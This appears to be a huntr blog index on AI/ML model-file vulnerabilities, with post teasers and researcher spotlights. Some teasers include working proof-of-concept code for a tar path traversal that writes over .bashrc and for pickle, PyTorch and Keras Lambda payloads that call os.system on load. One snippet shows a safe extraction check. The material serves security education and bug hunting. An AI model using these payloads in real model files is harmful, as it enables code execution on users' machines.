Hunting Vulnerabilities in Keras Model Deserialization

The ability to save (serialize) and load (deserialize) trained models is fundamental to machine learning frameworks. Training a neural network can take hours, days or even weeks on expensive hardware, so developers...

Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory

Introduction Some researchers dip their toes into AI/ML security. Phung Van Tai (aka @taiphung217) cannonballed in. Valedictorian of Vietnam’s Academy of Cryptography Techniques and now an AppSec engineer at OneMount Group, Tai...

Spotlight on Lyutoon: From Black Hat to Bug Bounties

Introduction Some Ph.D. candidates stay up late fine-tuning models. Tong Liu (aka Lyutoon) stays up late trying to break them. At huntr, we’ve got a thing for spotlighting hackers. This month, the...

Pivoting Archive Slip Bugs into High-Value AI/ML Bounties

Many ML model files — .nemo, .keras, .gguf, even trusty .pth — are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall() and, pow, you've opened the door to an...
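If you want a feel for the pattern before reading the write-up, here's a minimal sketch (file names like evil_model.nemo and the safe_extract helper are purely illustrative, and the payload is harmless): a tar member whose name starts with ../ escapes the extraction directory when a loader calls extractall() blindly, and a realpath check on each member is enough to catch it.

```python
import io
import os
import tarfile

# Attacker side: build a tar whose member name escapes the extraction
# directory (hypothetical filenames, harmless payload).
payload = b"echo pwned\n"
with tarfile.open("evil_model.nemo", "w") as archive:
    info = tarfile.TarInfo(name="../../.bashrc")
    info.size = len(payload)
    archive.addfile(info, io.BytesIO(payload))

# Vulnerable pattern: extractall() writes member paths as given.
# tarfile.open("evil_model.nemo").extractall("workdir")

# Safer pattern: validate every member's resolved path first
# (on Python 3.12+ you can also pass filter="data" to extractall()).
def safe_extract(archive_path: str, dest: str) -> None:
    dest = os.path.realpath(dest)
    with tarfile.open(archive_path) as archive:
        for member in archive.getmembers():
            target = os.path.realpath(os.path.join(dest, member.name))
            if not target.startswith(dest + os.sep):
                raise ValueError(f"blocked path traversal: {member.name}")
        archive.extractall(dest)
```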

Inside CVE-2025-1550: Remote Code Execution via Keras Models

Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras model—or, astonishingly,...
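Without spoiling the write-up: a .keras file is just a zip archive, and its config.json is the blueprint the loader follows during deserialization. A quick way to peek inside one before ever calling load_model() on it (assuming a local file named model.keras, which is purely illustrative):

```python
import json
import zipfile

# A Keras v3 ".keras" file is a zip archive; config.json drives
# reconstruction, so it is exactly the metadata worth inspecting
# when the file comes from somewhere you don't control.
with zipfile.ZipFile("model.keras") as zf:      # hypothetical filename
    print(zf.namelist())                        # e.g. config.json, metadata.json, model.weights.h5
    config = json.loads(zf.read("config.json"))
    print(config["class_name"])                 # which top-level object gets reconstructed
```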

Spotlight on winters0x64: Leveraging CTF Skills for AI/ML Bug Bounty Success

Introduction Some people skipped online classes during lockdown to binge Netflix. Arun Krishnan skipped them to hack on cheats for an online game—and ended up chasing bug bounties. This month, we're...

Pkl Rick’d: How Loading a .pkl File Can Lead to RCE

Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight. This one’s a classic pattern: pickle.load() + unsafe deserialization = RCE. Let’s unpack a clean,...
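The core primitive, as a minimal sketch with a harmless command standing in for attacker code (the Payload class name is just illustrative):

```python
import os
import pickle

# Anything reachable through __reduce__ runs during unpickling,
# before the caller ever sees the resulting object.
class Payload:
    def __reduce__(self):
        # Benign stand-in for attacker code; swap the command and
        # you have the RCE the post describes.
        return (os.system, ("id",))

blob = pickle.dumps(Payload())

# Victim side: a single pickle.loads()/pickle.load() on untrusted
# bytes executes the command above.
pickle.loads(blob)
```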

Exposing Keras Lambda Exploits in TensorFlow Models

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example...
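As a rough sketch of the idea (exact save/load flags vary by Keras/TensorFlow version, lambda_model.h5 is an illustrative filename, and the os.system call is a benign stand-in): a Python lambda wrapped in a Lambda layer ships its bytecode inside the saved model, and it runs again on whoever loads and uses the model.

```python
import tensorflow as tf

# Attacker side: a Python lambda is serialized, bytecode and all,
# into the saved model when it is wrapped in a Lambda layer.
evil = lambda x: (__import__("os").system("id"), x)[1]   # benign stand-in command

model = tf.keras.Sequential([
    tf.keras.Input(shape=(1,)),
    tf.keras.layers.Lambda(evil),
])
model.save("lambda_model.h5")   # legacy HDF5 format carries the lambda along

# Victim side: loading the model and running inference executes the
# lambda (newer Keras releases refuse unless safe_mode=False is passed).
loaded = tf.keras.models.load_model("lambda_model.h5", safe_mode=False)
loaded.predict(tf.zeros((1, 1)))
```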

Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect...
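A minimal sketch of the primitive (Payload and model.pth are illustrative names, and the command is benign): torch.save() pickles arbitrary Python objects, so a malicious __reduce__ does the rest the moment the file is loaded.

```python
import os
import torch

# Attacker side: torch.save() pickles arbitrary objects, so an object
# with a malicious __reduce__ travels inside the .pth file.
class Payload:
    def __reduce__(self):
        return (os.system, ("id",))   # benign stand-in for attacker code

torch.save({"state_dict": Payload()}, "model.pth")

# Victim side: torch.load() unpickles the file. With weights_only=False
# (the default on older PyTorch releases) the command above runs before
# any tensor is returned; newer releases default to weights_only=True,
# which rejects this payload.
torch.load("model.pth", weights_only=False)
```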

Unlocking Bug Bounty Success: Expert Tips from Dan McInerney

What’s the secret sauce behind consistent bug bounty success? Well, the answer lies in a strategic approach: dissecting a single project, identifying hot spots, leveraging the right tools, and focusing on impactful...

Getting Started with Docker: A Hacker’s Guide

Hey huntrs, Marcello Salvati here, threat researcher at Protect AI (acquired by Palo Alto Networks). I’m here to give you a crash course on Docker. If you’re diving into security research, Docker...

How to Hunt Vulnerabilities in Machine Learning Model File Formats

Introduction Let's talk about an often overlooked attack surface in AI systems: model file formats. Sure, everyone focuses on API security and web vulnerabilities, but there's a whole world of potential bugs...